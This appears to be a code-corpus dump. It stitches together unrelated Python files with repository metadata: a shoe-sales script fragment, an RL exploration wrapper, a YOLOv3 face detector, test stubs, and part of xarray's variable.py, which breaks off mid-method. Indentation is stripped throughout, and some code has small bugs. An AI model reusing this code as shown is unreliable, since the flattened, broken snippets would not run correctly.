# nUmber of customers
# what size did they buy and how much they paid
x = int(input())
n = Counter(map(int, input().split()))
n_c = int(input())
income = 0
for _ in range(n_c):
size, price = map(int, input().split())
if n[size]:
income += price
n[size] -= 1
print(income)
def income_count(num_shoes, shoe_sizes, num_cust):
pass
| 18.32 | 50 | 0.644105 |
ace09a5862dfe83720f437007186785230b3b138 | 3,789 | py | Python | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | 31 | 2017-07-18T17:09:34.000Z | 2022-02-16T05:35:45.000Z | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | null | null | null | humanrl/exploration.py | DFrolova/human-rl | c54ec02a48aba53a6e90d64570ebb7f62dfdea8e | [
"MIT"
] | 12 | 2017-07-19T00:14:13.000Z | 2022-03-05T00:49:00.000Z | """
isort:skip_file
"""
import gym
import numpy as np
from scipy import stats
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
def gaussian_kernel(size, std=1.):
size2 = 1 + 2 * size
kernel = np.zeros((size2, size2))
den = 2. * std * std
for row in range(size2):
for col in range(size2):
x = row - size
y = row - size
kernel[row, col] = np.exp(-(x*x + y*y) / den)
kernel /= kernel.sum()
return kernel
# TODO: check out of bounds
def extract_patch(src, pos, size):
row, col = pos
return src[row-size:row+size+1, col-size:col+size+1]
class ExplorationWrapper(gym.Wrapper):
# assumes env provides location data
def __init__(self, env, explore_buffer=1e4, bandwidth=3, decay=False, explore_scale=1.0, gamma=0.99, **unused):
super(ExplorationWrapper, self).__init__(env)
self.explore_scale = explore_scale
print(explore_scale)
self.total = int(explore_buffer)
self.bandwidth = bandwidth
self.kde = None
self.locations = []
self.breadth = int(bandwidth)
self.kernel = gaussian_kernel(self.breadth, bandwidth)
rows = 210 + 2 * self.breadth
cols = 160 + 2 * self.breadth
self.counts = np.full((rows, cols), self.total / (rows * cols))
self.logprob = -np.log(self.counts.size)
if decay:
self.decay = 1. - 1. / self.total
else:
self.decay = None
self.gamma = gamma
def _step(self, action):
obs, reward, done, info = self.env.step(action)
location = info.get('location')
if location is not None:
"""
self.locations.append(location)
if len(self.locations) == self.buffer_size:
# rebuild the kde
self.kde = stats.gaussian_kde(np.array(self.locations).T, self.bandwidth)
# plot it?
dims = obs.shape[:2]
grid = np.indices(dims)
kde = self.kde.logpdf(grid.reshape([2, -1]))
kde = kde.reshape(dims)
info['kde'] = kde
#plt.imsave('test.png', kde)
# drop the older locations
self.locations = self.locations[self.buffer_size//2:]
#plt.imsave('counts.png', self.counts)
#info['logprob'] = logprob
if self.kde:
logpdf = self.kde.logpdf(np.array(location))
info['logpdf'] = logpdf
reward -= logpdf
"""
location = location + self.breadth # padding
index = tuple(location.tolist())
patch = extract_patch(self.counts, index, self.breadth)
count = (self.kernel * patch).sum()
info['log/visits'] = count
logprob = np.log(count / self.total)
info['log/visit_logprob'] = logprob
#reward = 0
bonus = self.explore_scale * (self.logprob - logprob)
info['log/explore_bonus'] = np.abs(bonus)
reward += bonus
self.logprob = logprob
if self.decay:
self.counts *= self.decay
else:
self.total += 1
self.counts[index] += 1
return obs, reward, done, info
if __name__ == "__main__":
from location_wrapper import LocationWrapper
env = gym.make("MontezumaRevengeDeterministic-v3")
env = LocationWrapper(env)
env = ExplorationWrapper(env)
while True:
action = env.action_space.sample()
obs, reward, done, info = env.step(action)
env.render()
if done:
env.reset()
| 26.683099 | 115 | 0.544471 |
ace09ab0522701559c67ae483785af313202cef9 | 12,971 | py | Python | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | components/face_detect/yolo_v3_face.py | JamesFengi/handPose_Eric | 3e329181930ebc7ef0fed2abb9a9d092a8541f9c | [
"Apache-2.0"
] | null | null | null | #-*-coding:utf-8-*-
# date:2021-04-16
# Author: Eric.Lee
# function: yolo v3 face detect
import os
import cv2
import numpy as np
import time
import torch
from face_detect.yolov3 import Yolov3, Yolov3Tiny
from face_detect.utils.torch_utils import select_device
from face_detect.acc_model import acc_model
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import random
def show_model_param(model):
params = list(model.parameters())
k = 0
for i in params:
l = 1
for j in i.size():
l *= j
print("该层的结构: {}, 参数和: {}".format(str(list(i.size())), str(l)))
k = k + l
print("----------------------")
print("总参数数量和: " + str(k))
def process_data(img, img_size=416):# 图像预处理
img, _, _, _ = letterbox(img, height=img_size)
# Normalize RG25
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * max(img.shape[0:2])) + 1 # line thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [255, 55,90], thickness=tf, lineType=cv2.LINE_AA)
def bbox_iou(box1, box2, x1y1x2y2=True):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.t()
# Get the coordinates of bounding boxes
if x1y1x2y2:
# x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else:
# x, y, w, h = box1
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter_area = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
union_area = ((b1_x2 - b1_x1) * (b1_y2 - b1_y1) + 1e-16) + \
(b2_x2 - b2_x1) * (b2_y2 - b2_y1) - inter_area
return inter_area / union_area # iou
def xywh2xyxy(x):
# Convert bounding box format from [x, y, w, h] to [x1, y1, x2, y2]
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2
y[:, 1] = x[:, 1] - x[:, 3] / 2
y[:, 2] = x[:, 0] + x[:, 2] / 2
y[:, 3] = x[:, 1] + x[:, 3] / 2
return y
def scale_coords(img_size, coords, img0_shape):# image size 转为 原图尺寸
# Rescale x1, y1, x2, y2 from 416 to image size
# print('coords : ',coords)
# print('img0_shape : ',img0_shape)
gain = float(img_size) / max(img0_shape) # gain = old / new
# print('gain : ',gain)
pad_x = (img_size - img0_shape[1] * gain) / 2 # width padding
pad_y = (img_size - img0_shape[0] * gain) / 2 # height padding
# print('pad_xpad_y : ',pad_x,pad_y)
coords[:, [0, 2]] -= pad_x
coords[:, [1, 3]] -= pad_y
coords[:, :4] /= gain
coords[:, :4] = torch.clamp(coords[:, :4], min=0)# 夹紧区间最小值不为负数
return coords
def non_max_suppression(prediction, conf_thres=0.5, nms_thres=0.4):
"""
Removes detections with lower object confidence score than 'conf_thres'
Non-Maximum Suppression to further filter detections.
Returns detections with shape:
(x1, y1, x2, y2, object_conf, class_conf, class)
"""
min_wh = 2 # (pixels) minimum box width and height
output = [None] * len(prediction)
for image_i, pred in enumerate(prediction):
# Experiment: Prior class size rejection
# x, y, w, h = pred[:, 0], pred[:, 1], pred[:, 2], pred[:, 3]
# a = w * h # area
# ar = w / (h + 1e-16) # aspect ratio
# n = len(w)
# log_w, log_h, log_a, log_ar = torch.log(w), torch.log(h), torch.log(a), torch.log(ar)
# shape_likelihood = np.zeros((n, 60), dtype=np.float32)
# x = np.concatenate((log_w.reshape(-1, 1), log_h.reshape(-1, 1)), 1)
# from scipy.stats import multivariate_normal
# for c in range(60):
# shape_likelihood[:, c] =
# multivariate_normal.pdf(x, mean=mat['class_mu'][c, :2], cov=mat['class_cov'][c, :2, :2])
# Filter out confidence scores below threshold
class_conf, class_pred = pred[:, 5:].max(1) # max class_conf, index
pred[:, 4] *= class_conf # finall conf = obj_conf * class_conf
i = (pred[:, 4] > conf_thres) & (pred[:, 2] > min_wh) & (pred[:, 3] > min_wh)
# s2=time.time()
pred2 = pred[i]
# print("++++++pred2 = pred[i]",time.time()-s2, pred2)
# If none are remaining => process next image
if len(pred2) == 0:
continue
# Select predicted classes
class_conf = class_conf[i]
class_pred = class_pred[i].unsqueeze(1).float()
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
pred2[:, :4] = xywh2xyxy(pred2[:, :4])
# pred[:, 4] *= class_conf # improves mAP from 0.549 to 0.551
# Detections ordered as (x1y1x2y2, obj_conf, class_conf, class_pred)
pred2 = torch.cat((pred2[:, :5], class_conf.unsqueeze(1), class_pred), 1)
# Get detections sorted by decreasing confidence scores
pred2 = pred2[(-pred2[:, 4]).argsort()]
det_max = []
nms_style = 'MERGE' # 'OR' (default), 'AND', 'MERGE' (experimental)
for c in pred2[:, -1].unique():
dc = pred2[pred2[:, -1] == c] # select class c
dc = dc[:min(len(dc), 100)] # limit to first 100 boxes
# Non-maximum suppression
if nms_style == 'OR': # default
# METHOD1
# ind = list(range(len(dc)))
# while len(ind):
# j = ind[0]
# det_max.append(dc[j:j + 1]) # save highest conf detection
# reject = (bbox_iou(dc[j], dc[ind]) > nms_thres).nonzero()
# [ind.pop(i) for i in reversed(reject)]
# METHOD2
while dc.shape[0]:
det_max.append(dc[:1]) # save highest conf detection
if len(dc) == 1: # Stop if we're at the last detection
break
iou = bbox_iou(dc[0], dc[1:]) # iou with other boxes
dc = dc[1:][iou < nms_thres] # remove ious > threshold
elif nms_style == 'AND': # requires overlap, single boxes erased
while len(dc) > 1:
iou = bbox_iou(dc[0], dc[1:]) # iou with other boxes
if iou.max() > 0.5:
det_max.append(dc[:1])
dc = dc[1:][iou < nms_thres] # remove ious > threshold
elif nms_style == 'MERGE': # weighted mixture box
while len(dc):
i = bbox_iou(dc[0], dc) > nms_thres # iou with other boxes
weights = dc[i, 4:5]
dc[0, :4] = (weights * dc[i, :4]).sum(0) / weights.sum()
det_max.append(dc[:1])
dc = dc[i == 0]
if len(det_max):
det_max = torch.cat(det_max) # concatenate
output[image_i] = det_max[(-det_max[:, 4]).argsort()] # sort
return output
def letterbox(img, height=416, augment=False, color=(127.5, 127.5, 127.5)):
# Resize a rectangular image to a padded square
shape = img.shape[:2] # shape = [height, width]
ratio = float(height) / max(shape) # ratio = old / new
new_shape = (round(shape[1] * ratio), round(shape[0] * ratio))
dw = (height - new_shape[0]) / 2 # width padding
dh = (height - new_shape[1]) / 2 # height padding
top, bottom = round(dh - 0.1), round(dh + 0.1)
left, right = round(dw - 0.1), round(dw + 0.1)
# resize img
if augment:
interpolation = np.random.choice([None, cv2.INTER_NEAREST, cv2.INTER_LINEAR,
None, cv2.INTER_NEAREST, cv2.INTER_LINEAR,
cv2.INTER_AREA, cv2.INTER_CUBIC, cv2.INTER_LANCZOS4])
if interpolation is None:
img = cv2.resize(img, new_shape)
else:
img = cv2.resize(img, new_shape, interpolation=interpolation)
else:
img = cv2.resize(img, new_shape, interpolation=cv2.INTER_NEAREST)
# print("resize time:",time.time()-s1)
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # padded square
return img, ratio, dw, dh
#---------------------------------------------------------
# model_path = './coco_model/yolov3_coco.pt' # 检测模型路径
# model_arch = 'yolov3' # 模型类型
# img_size = 416 # 图像尺寸
# conf_thres = 0.35# 检测置信度
# nms_thres = 0.5 # nms 阈值
class yolo_v3_face_model(object):
def __init__(self,
model_path = './components/face_detect/weights/face_yolo_416-20210418.pt',
model_arch = 'yolov3',
yolo_anchor_scale = 1.,
img_size=416,
conf_thres=0.4,
nms_thres=0.4,):
print("yolo v3 face_model loading : {}".format(model_path))
self.use_cuda = torch.cuda.is_available()
self.device = torch.device("cuda:0" if self.use_cuda else "cpu")
self.img_size = img_size
self.classes = ["Face"]
self.num_classes = len(self.classes)
self.conf_thres = conf_thres
self.nms_thres = nms_thres
#-----------------------------------------------------------------------
weights = model_path
if "tiny" in model_arch:
a_scalse = 416./img_size*yolo_anchor_scale
anchors=[(10, 14), (23, 27), (37, 58), (81, 82), (135, 169), (344, 319)]
anchors_new = [ (int(anchors[j][0]/a_scalse),int(anchors[j][1]/a_scalse)) for j in range(len(anchors)) ]
model = Yolov3Tiny(self.num_classes,anchors = anchors_new)
else:
a_scalse = 416./img_size
anchors=[(10,13), (16,30), (33,23), (30,61), (62,45), (59,119), (116,90), (156,198), (373,326)]
anchors_new = [ (int(anchors[j][0]/a_scalse),int(anchors[j][1]/a_scalse)) for j in range(len(anchors)) ]
model = Yolov3(self.num_classes,anchors = anchors_new)
#-----------------------------------------------------------------------
self.model = model
# show_model_param(self.model)# 显示模型参数
# print('num_classes : ',self.num_classes)
self.device = select_device() # 运行硬件选择
self.use_cuda = torch.cuda.is_available()
# Load weights
if os.access(weights,os.F_OK):# 判断模型文件是否存在
self.model.load_state_dict(torch.load(weights, map_location=lambda storage, loc: storage)['model'])
else:
print('------- >>> error : model not exists')
return False
#
self.model.eval()#模型设置为 eval
acc_model('',self.model)
self.model = self.model.to(self.device)
def predict(self, img_,vis):
with torch.no_grad():
t = time.time()
img = process_data(img_, self.img_size)
t1 = time.time()
img = torch.from_numpy(img).unsqueeze(0).to(self.device)
pred, _ = self.model(img)#图片检测
t2 = time.time()
detections = non_max_suppression(pred, self.conf_thres, self.nms_thres)[0] # nms
t3 = time.time()
# print("t3 time:", t3)
if (detections is None) or len(detections) == 0:
return []
# Rescale boxes from 416 to true image size
detections[:, :4] = scale_coords(self.img_size, detections[:, :4], img_.shape).round()
# 绘制检测结果 :detect reslut
dets_for_landmarks = []
colors = [(v // 32 * 64 + 64, (v // 8) % 4 * 64, v % 8 * 32) for v in range(1, 10 + 1)][::-1]
output_dict_ = []
for *xyxy, conf, cls_conf, cls in detections:
label = '%s %.2f' % (self.classes[0], conf)
x1,y1,x2,y2 = xyxy
output_dict_.append((float(x1),float(y1),float(x2),float(y2),float(conf.item())))
if vis:
plot_one_box(xyxy, img_, label=label, color=(0,175,255), line_thickness = 2)
return output_dict_
| 41.573718 | 116 | 0.545602 |
ace09b4976a3bfe0b43e1b45a23b421cdb461199 | 1,230 | py | Python | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import layint_api
from layint_api.rest import ApiException
from layint_api.models.cve_search import CveSearch
class TestCveSearch(unittest.TestCase):
""" CveSearch unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testCveSearch(self):
"""
Test CveSearch
"""
# FIXME: construct object with mandatory attributes with example values
#model = layint_api.models.cve_search.CveSearch()
pass
if __name__ == '__main__':
unittest.main()
| 27.333333 | 383 | 0.730081 |
ace09b994d65d88f8ed40c382ae1485a715d80ff | 1,118 | py | Python | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | import unittest
from unittest.mock import Mock
import datetime
from xapitrader.utils import time
class TimeTests(unittest.TestCase):
def test_delta_miliseconds(self):
from_date = datetime.datetime(year=2010, month=5, day=4)
to_date = datetime.datetime(year=2010, month=4, day=6)
from_date_miliseconds = 1272963600000
to_date_miliseconds = 1270544400000
delta = time.delta_miliseconds(from_date, to_date)
self.assertEqual(delta, from_date_miliseconds-to_date_miliseconds)
def test_datetime_from_now(self):
time.now=Mock(return_value=datetime.datetime(year=2010, month=4, day=10))
date = time.datetime_from_now(days=5, hours=4)
self.assertEqual(date,datetime.datetime(year=2010, month=4, day=4, hour=20))
def test_miliseconds_from_initial(self):
to_date = datetime.datetime(year=2010, month=5, day=4)
ms_from_initial= time.miliseconds_from_initial(to_date)
expected_miliseconds = 1272931200000
self.assertEqual(ms_from_initial, expected_miliseconds)
if __name__ == '__main__':
unittest.main() | 36.064516 | 84 | 0.729875 |
ace09c6f48211e667796f5e8fd93839fa186d4cb | 106,652 | py | Python | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | 8 | 2021-05-17T06:35:28.000Z | 2022-01-10T17:05:35.000Z | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | import copy
import itertools
import numbers
import warnings
from collections import defaultdict
from datetime import timedelta
from typing import (
Any,
Dict,
Hashable,
List,
Mapping,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
)
import numpy as np
import pandas as pd
import xarray as xr # only for Dataset and DataArray
from . import common, dtypes, duck_array_ops, indexing, nputils, ops, utils
from .arithmetic import VariableArithmetic
from .common import AbstractArray
from .indexes import PandasIndex, wrap_pandas_index
from .indexing import BasicIndexer, OuterIndexer, VectorizedIndexer, as_indexable
from .options import _get_keep_attrs
from .pycompat import (
cupy_array_type,
dask_array_type,
integer_types,
is_duck_dask_array,
)
from .utils import (
NdimSizeLenMixin,
OrderedSet,
_default,
decode_numpy_dict_values,
drop_dims_from_indexers,
either_dict_or_kwargs,
ensure_us_time_resolution,
infix_dims,
is_duck_array,
maybe_coerce_to_str,
)
NON_NUMPY_SUPPORTED_ARRAY_TYPES = (
(
indexing.ExplicitlyIndexed,
pd.Index,
)
+ dask_array_type
+ cupy_array_type
)
# https://github.com/python/mypy/issues/224
BASIC_INDEXING_TYPES = integer_types + (slice,)
VariableType = TypeVar("VariableType", bound="Variable")
"""Type annotation to be used when methods of Variable return self or a copy of self.
When called from an instance of a subclass, e.g. IndexVariable, mypy identifies the
output as an instance of the subclass.
Usage::
class Variable:
def f(self: VariableType, ...) -> VariableType:
...
"""
class MissingDimensionsError(ValueError):
"""Error class used when we can't safely guess a dimension name."""
# inherits from ValueError for backward compatibility
# TODO: move this to an xarray.exceptions module?
def as_variable(obj, name=None) -> "Union[Variable, IndexVariable]":
"""Convert an object into a Variable.
Parameters
----------
obj : object
Object to convert into a Variable.
- If the object is already a Variable, return a shallow copy.
- Otherwise, if the object has 'dims' and 'data' attributes, convert
it into a new Variable.
- If all else fails, attempt to convert the object into a Variable by
unpacking it into the arguments for creating a new Variable.
name : str, optional
If provided:
- `obj` can be a 1D array, which is assumed to label coordinate values
along a dimension of this given name.
- Variables with name matching one of their dimensions are converted
into `IndexVariable` objects.
Returns
-------
var : Variable
The newly created variable.
"""
from .dataarray import DataArray
# TODO: consider extending this method to automatically handle Iris and
if isinstance(obj, DataArray):
# extract the primary Variable from DataArrays
obj = obj.variable
if isinstance(obj, Variable):
obj = obj.copy(deep=False)
elif isinstance(obj, tuple):
if isinstance(obj[1], DataArray):
# TODO: change into TypeError
warnings.warn(
(
"Using a DataArray object to construct a variable is"
" ambiguous, please extract the data using the .data property."
" This will raise a TypeError in 0.19.0."
),
DeprecationWarning,
)
try:
obj = Variable(*obj)
except (TypeError, ValueError) as error:
# use .format() instead of % because it handles tuples consistently
raise error.__class__(
"Could not convert tuple of form "
"(dims, data[, attrs, encoding]): "
"{} to Variable.".format(obj)
)
elif utils.is_scalar(obj):
obj = Variable([], obj)
elif isinstance(obj, (pd.Index, IndexVariable)) and obj.name is not None:
obj = Variable(obj.name, obj)
elif isinstance(obj, (set, dict)):
raise TypeError("variable {!r} has invalid type {!r}".format(name, type(obj)))
elif name is not None:
data = as_compatible_data(obj)
if data.ndim != 1:
raise MissingDimensionsError(
f"cannot set variable {name!r} with {data.ndim!r}-dimensional data "
"without explicit dimension names. Pass a tuple of "
"(dims, data) instead."
)
obj = Variable(name, data, fastpath=True)
else:
raise TypeError(
"unable to convert object into a variable without an "
f"explicit list of dimensions: {obj!r}"
)
if name is not None and name in obj.dims:
# convert the Variable into an Index
if obj.ndim != 1:
raise MissingDimensionsError(
f"{name!r} has more than 1-dimension and the same name as one of its "
f"dimensions {obj.dims!r}. xarray disallows such variables because they "
"conflict with the coordinates used to label dimensions."
)
obj = obj.to_index_variable()
return obj
def _maybe_wrap_data(data):
"""
Put pandas.Index and numpy.ndarray arguments in adapter objects to ensure
they can be indexed properly.
NumpyArrayAdapter, PandasIndex and LazilyIndexedArray should
all pass through unmodified.
"""
if isinstance(data, pd.Index):
return wrap_pandas_index(data)
return data
def _possibly_convert_objects(values):
"""Convert arrays of datetime.datetime and datetime.timedelta objects into
datetime64 and timedelta64, according to the pandas convention. Also used for
validating that datetime64 and timedelta64 objects are within the valid date
range for ns precision, as pandas will raise an error if they are not.
"""
return np.asarray(pd.Series(values.ravel())).reshape(values.shape)
def as_compatible_data(data, fastpath=False):
"""Prepare and wrap data to put in a Variable.
- If data does not have the necessary attributes, convert it to ndarray.
- If data has dtype=datetime64, ensure that it has ns precision. If it's a
pandas.Timestamp, convert it to datetime64.
- If data is already a pandas or xarray object (other than an Index), just
use the values.
Finally, wrap it up with an adapter if necessary.
"""
if fastpath and getattr(data, "ndim", 0) > 0:
# can't use fastpath (yet) for scalars
return _maybe_wrap_data(data)
if isinstance(data, Variable):
return data.data
if isinstance(data, NON_NUMPY_SUPPORTED_ARRAY_TYPES):
return _maybe_wrap_data(data)
if isinstance(data, tuple):
data = utils.to_0d_object_array(data)
if isinstance(data, pd.Timestamp):
# TODO: convert, handle datetime objects, too
data = np.datetime64(data.value, "ns")
if isinstance(data, timedelta):
data = np.timedelta64(getattr(data, "value", data), "ns")
# we don't want nested self-described arrays
if isinstance(data, (pd.Series, pd.Index, pd.DataFrame)):
data = data.values
if isinstance(data, np.ma.MaskedArray):
mask = np.ma.getmaskarray(data)
if mask.any():
dtype, fill_value = dtypes.maybe_promote(data.dtype)
data = np.asarray(data, dtype=dtype)
data[mask] = fill_value
else:
data = np.asarray(data)
if not isinstance(data, np.ndarray) and hasattr(data, "__array_function__"):
return data
# validate whether the data is valid data types.
data = np.asarray(data)
if isinstance(data, np.ndarray) and data.dtype.kind in "OMm":
data = _possibly_convert_objects(data)
return _maybe_wrap_data(data)
def _as_array_or_item(data):
"""Return the given values as a numpy array, or as an individual item if
it's a 0d datetime64 or timedelta64 array.
Importantly, this function does not copy data if it is already an ndarray -
otherwise, it will not be possible to update Variable values in place.
This function mostly exists because 0-dimensional ndarrays with
dtype=datetime64 are broken :(
https://github.com/numpy/numpy/issues/4337
https://github.com/numpy/numpy/issues/7619
TODO: remove this (replace with np.asarray) once these issues are fixed
"""
data = data.get() if isinstance(data, cupy_array_type) else np.asarray(data)
if data.ndim == 0:
if data.dtype.kind == "M":
data = np.datetime64(data, "ns")
elif data.dtype.kind == "m":
data = np.timedelta64(data, "ns")
return data
class Variable(AbstractArray, NdimSizeLenMixin, VariableArithmetic):
"""A netcdf-like variable consisting of dimensions, data and attributes
which describe a single Array. A single Variable object is not fully
described outside the context of its parent Dataset (if you want such a
fully described object, use a DataArray instead).
The main functional difference between Variables and numpy arrays is that
numerical operations on Variables implement array broadcasting by dimension
name. For example, adding an Variable with dimensions `('time',)` to
another Variable with dimensions `('space',)` results in a new Variable
with dimensions `('time', 'space')`. Furthermore, numpy reduce operations
like ``mean`` or ``sum`` are overwritten to take a "dimension" argument
instead of an "axis".
Variables are light-weight objects used as the building block for datasets.
They are more primitive objects, so operations with them provide marginally
higher performance than using DataArrays. However, manipulating data in the
form of a Dataset or DataArray should almost always be preferred, because
they can use more complete metadata in context of coordinate labels.
"""
__slots__ = ("_dims", "_data", "_attrs", "_encoding")
def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False):
"""
Parameters
----------
dims : str or sequence of str
Name(s) of the the data dimension(s). Must be either a string (only
for 1D data) or a sequence of strings with length equal to the
number of dimensions.
data : array_like
Data array which supports numpy-like data access.
attrs : dict_like or None, optional
Attributes to assign to the new variable. If None (default), an
empty attribute dictionary is initialized.
encoding : dict_like or None, optional
Dictionary specifying how to encode this array's data into a
serialized format like netCDF4. Currently used keys (for netCDF)
include '_FillValue', 'scale_factor', 'add_offset' and 'dtype'.
Well-behaved code to serialize a Variable should ignore
unrecognized encoding items.
"""
self._data = as_compatible_data(data, fastpath=fastpath)
self._dims = self._parse_dimensions(dims)
self._attrs = None
self._encoding = None
if attrs is not None:
self.attrs = attrs
if encoding is not None:
self.encoding = encoding
@property
def dtype(self):
return self._data.dtype
@property
def shape(self):
return self._data.shape
@property
def nbytes(self):
return self.size * self.dtype.itemsize
@property
def _in_memory(self):
return isinstance(self._data, (np.ndarray, np.number, PandasIndex)) or (
isinstance(self._data, indexing.MemoryCachedArray)
and isinstance(self._data.array, indexing.NumpyIndexingAdapter)
)
@property
def data(self):
if is_duck_array(self._data):
return self._data
else:
return self.values
@data.setter
def data(self, data):
data = as_compatible_data(data)
if data.shape != self.shape:
raise ValueError(
f"replacement data must match the Variable's shape. "
f"replacement data has shape {data.shape}; Variable has shape {self.shape}"
)
self._data = data
def astype(
self: VariableType,
dtype,
*,
order=None,
casting=None,
subok=None,
copy=None,
keep_attrs=True,
) -> VariableType:
"""
Copy of the Variable object, with data cast to a specified type.
Parameters
----------
dtype : str or dtype
Typecode or data-type to which the array is cast.
order : {'C', 'F', 'A', 'K'}, optional
Controls the memory layout order of the result. ‘C’ means C order,
‘F’ means Fortran order, ‘A’ means ‘F’ order if all the arrays are
Fortran contiguous, ‘C’ order otherwise, and ‘K’ means as close to
the order the array elements appear in memory as possible.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur.
* 'no' means the data types should not be cast at all.
* 'equiv' means only byte-order changes are allowed.
* 'safe' means only casts which can preserve values are allowed.
* 'same_kind' means only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe' means any data conversions may be done.
subok : bool, optional
If True, then sub-classes will be passed-through, otherwise the
returned array will be forced to be a base-class array.
copy : bool, optional
By default, astype always returns a newly allocated array. If this
is set to False and the `dtype` requirement is satisfied, the input
array is returned instead of a copy.
keep_attrs : bool, optional
By default, astype keeps attributes. Set to False to remove
attributes in the returned object.
Returns
-------
out : same as object
New object with data cast to the specified type.
Notes
-----
The ``order``, ``casting``, ``subok`` and ``copy`` arguments are only passed
through to the ``astype`` method of the underlying array when a value
different than ``None`` is supplied.
Make sure to only supply these arguments if the underlying array class
supports them.
See Also
--------
numpy.ndarray.astype
dask.array.Array.astype
sparse.COO.astype
"""
from .computation import apply_ufunc
kwargs = dict(order=order, casting=casting, subok=subok, copy=copy)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
return apply_ufunc(
duck_array_ops.astype,
self,
dtype,
kwargs=kwargs,
keep_attrs=keep_attrs,
dask="allowed",
)
def load(self, **kwargs):
"""Manually trigger loading of this variable's data from disk or a
remote source into memory and return this variable.
Normally, it should not be necessary to call this method in user code,
because all xarray functions should either work on deferred data or
load data automatically.
Parameters
----------
**kwargs : dict
Additional keyword arguments passed on to ``dask.array.compute``.
See Also
--------
dask.array.compute
"""
if is_duck_dask_array(self._data):
self._data = as_compatible_data(self._data.compute(**kwargs))
elif not is_duck_array(self._data):
self._data = np.asarray(self._data)
return self
def compute(self, **kwargs):
"""Manually trigger loading of this variable's data from disk or a
remote source into memory and return a new variable. The original is
left unaltered.
Normally, it should not be necessary to call this method in user code,
because all xarray functions should either work on deferred data or
load data automatically.
Parameters
----------
**kwargs : dict
Additional keyword arguments passed on to ``dask.array.compute``.
See Also
--------
dask.array.compute
"""
new = self.copy(deep=False)
return new.load(**kwargs)
def __dask_tokenize__(self):
